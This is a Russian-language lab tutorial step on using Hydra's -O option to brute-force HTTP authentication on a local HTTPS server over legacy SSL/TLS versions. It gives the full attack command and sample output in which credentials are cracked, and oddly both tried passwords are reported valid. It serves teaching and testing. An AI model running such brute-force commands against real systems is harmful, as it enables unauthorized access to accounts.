Тестирование старых версий SSL с опцией -O
На этом этапе мы узнаем, как использовать опцию -O в Hydra для проверки на наличие уязвимых старых версий протоколов SSL/TLS. Опция -O заставляет Hydra использовать старые версии SSL, которые могут быть уязвимыми к различным атакам, таким как POODLE или BEAST.
Прежде чем продолжить, важно понимать, что использование старых версий протоколов SSL/TLS в целом не рекомендуется из-за уязвимостей безопасности. Этот этап предназначен для образовательных целей, чтобы показать, как Hydra можно использовать для выявления систем, которые все еще поддерживают эти устаревшие протоколы.
Для использования опции -O мы просто добавляем ее к нашей предыдущей команде Hydra. Убедитесь, что HTTPS-сервер из Шага 1 все еще запущен. Откройте новое окно терминала (оставьте HTTPS-сервер запущенным в другом окне) и перейдите в каталог ~/project:
cd ~/project
Теперь выполните следующую команду Hydra:
hydra -l test -P passwords.txt 127.0.0.1 https-get / -S -O -vV
Единственное отличие между этой командой и командой из Шага 2 - это добавление опции -O.
-O: Принудительно заставляет Hydra использовать старые версии SSL.
Hydra теперь попытается провести брутфорс-атаку на HTTPS-сервер, используя старые версии протоколов SSL/TLS. Вывод будет похож на вывод предыдущего шага, но вы, возможно, увидите предупреждения или ошибки, связанные с использованием старых версий SSL.
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-02 14:13:19
[DATA] max 2 tasks per 1 server, overall 2 tasks, 2 login tries (l:1/p:2), ~1 try per task
[DATA] attacking http-gets://127.0.0.1:443/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 127.0.0.1 - login "test" - pass "password" - 1 of 2 [child 0] (0/0)
[ATTEMPT] target 127.0.0.1 - login "test" - pass "123456" - 2 of 2 [child 1] (0/0)
[443][http-get] host: 127.0.0.1 login: test password: password
[STATUS] attack finished for 127.0.0.1 (waiting for children to complete tests)
[443][http-get] host: 127.0.0.1 login: test password: 123456
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-02 14:13:19
Если атака завершилась успешно, Hydra отобразит правильное имя пользователя и пароль, как и на предыдущем этапе. Основная идея этого шага заключается в том, что опция -O позволяет нам проверить совместимость сервера со старыми версиями протоколов SSL/TLS.
Возможно, сервер отклонит соединение, если он не поддерживает старые протоколы. В таком случае Hydra, возможно, не найдет пароль. Однако цель этого шага - продемонстрировать использование опции -O, а не обязательно гарантировать успешный вход.